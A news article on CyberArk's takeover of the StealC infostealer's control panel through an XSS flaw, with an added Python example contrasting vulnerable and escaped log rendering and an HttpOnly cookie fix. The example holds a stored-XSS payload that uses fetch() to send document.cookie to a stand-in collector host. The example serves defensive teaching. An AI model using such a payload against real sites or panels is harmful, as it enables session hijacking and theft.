- CyberArk exploited StealC’s control panel via source leak and XSS flaws
- Researchers unveiled an attacker, dubbed “YouTubeTA”, who stole 390,000 passwords and 30 million cookies
- Findings could disrupt StealC operations by attracting additional investigations and attacks
Cybersecurity researchers have managed to break into the web-based control panel of the StealC infostealer and gain valuable information about how the malware works and about who both the attackers and the victims are.
StealC is an immensely popular infostealer malware that first appeared a few years ago and has since become a mainstay of the cybercriminal community.
It can collect and exfiltrate sensitive data such as web browser credentials, cookies, system information, messaging app and email data, as well as cryptocurrency wallet details, and it offers various features such as modular targeting, stealthy execution, and flexible command-and-control communication.
Doxxing the attackers
CyberArk security researchers found two ways into the control panel: a source code leak that happened around April 2025, and a cross-site scripting (XSS) vulnerability they discovered in the panel itself.
“By exploiting the vulnerability, we were able to identify characteristics of the threat actor’s computers, including general location indicators and computer hardware details,” the researchers said. “Additionally, we were able to retrieve active session cookies, which allowed us to gain control over sessions from our own machines.”
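The passage above describes the classic route to a panel takeover: an infostealer's web panel renders data that came from a victim machine, so anyone who can plant a payload in a "victim" field gets script execution in the operator's browser and, if the session cookie is readable from script, the operator's session. The following is an added example, not code from CyberArk's report or from StealC, and it says nothing about where StealC's actual flaw was. It assumes a toy panel that renders per-victim log fields (hostname, OS) into an HTML table; the field names, the payload and the collector hostname are constructed for illustration. It shows the vulnerable rendering beside the escaped version, a parser-based check for markup that would survive into the page, and a session cookie set so that `document.cookie` cannot read it.

```python
"""Toy infostealer-style log viewer: the stored-XSS pattern behind panel takeover.

Added example (not CyberArk's or StealC's code). Assumes a web panel that
renders per-victim log fields into an HTML table; the field names, payload
and collector host below are constructed for illustration.
"""
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed sample log. The "hostname" field is controlled by whoever owns
# the reporting machine, so a researcher (or rival) can put a payload there.
POISONED_LOG = {
    "hostname": "<img src=x onerror=\"fetch('//collector.example/?c='+document.cookie)\">",
    "os": "Windows 10 Pro",
}

# The only tags the viewer itself emits; anything else came from the data.
ALLOWED_TAGS = {"tr", "td"}


def render_log_vulnerable(log):
    """Interpolates untrusted fields straight into HTML: stored XSS."""
    return f"<tr><td>{log['hostname']}</td><td>{log['os']}</td></tr>"


def render_log_fixed(log):
    """HTML-escapes every field; quote=True also covers attribute contexts."""
    cells = "".join(
        f"<td>{html.escape(str(log[k]), quote=True)}</td>" for k in ("hostname", "os")
    )
    return f"<tr>{cells}</tr>"


class _TagAudit(HTMLParser):
    """Records tags outside the viewer's own markup and any on* event handler."""

    def __init__(self):
        super().__init__()
        self.foreign_tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.foreign_tags.append(tag)
        self.handlers += [name for name, _ in attrs if name.lower().startswith("on")]

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def injected_markup(rendered):
    """Return (foreign_tags, event_handlers) a browser would act on in `rendered`."""
    audit = _TagAudit()
    audit.feed(rendered)
    audit.close()
    return audit.foreign_tags, audit.handlers


def session_cookie_header(token):
    """Set-Cookie value for a panel session that page script cannot read."""
    jar = SimpleCookie()
    jar["panel_session"] = token
    morsel = jar["panel_session"]
    morsel["httponly"] = True   # document.cookie never sees it
    morsel["secure"] = True     # HTTPS only
    morsel["samesite"] = "Strict"
    morsel["path"] = "/"
    return jar.output(header="").strip()


if __name__ == "__main__":
    print("vulnerable:", injected_markup(render_log_vulnerable(POISONED_LOG)))
    print("fixed:     ", injected_markup(render_log_fixed(POISONED_LOG)))
    print(session_cookie_header("example-token"))
```

Escaping at the point of rendering removes the injected `<img>` and its `onerror` handler; the HttpOnly flag is the second half of the fix, since it is what stops a payload that does get through from reading the operator's session cookie the way the quoted passage describes. An XSS can still drive the panel from inside the operator's browser, so neither half is a substitute for the other.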
The report describes a threat actor, dubbed “YouTubeTA,” who used stolen credentials to log into legitimate YouTube channels and plant links to the malware. The campaign brought YouTubeTA more than 5,000 victim logs, 390,000 passwords and 30 million cookies.
CyberArk discovered that the attacker was using an Apple M3-based device with English and Russian language settings. The time zone was set to Eastern Europe, and on at least one occasion they logged in from Ukraine. Cybercriminals normally log in only through a VPN to hide their origin, but this threat actor skipped that step at least once and exposed an IP address belonging to the Ukrainian ISP TRK Cable TV.
By publishing these findings, CyberArk hopes that StealC will also be targeted by other parties, both benign and malicious, disrupting the entire operation.
Via Bleeping Computer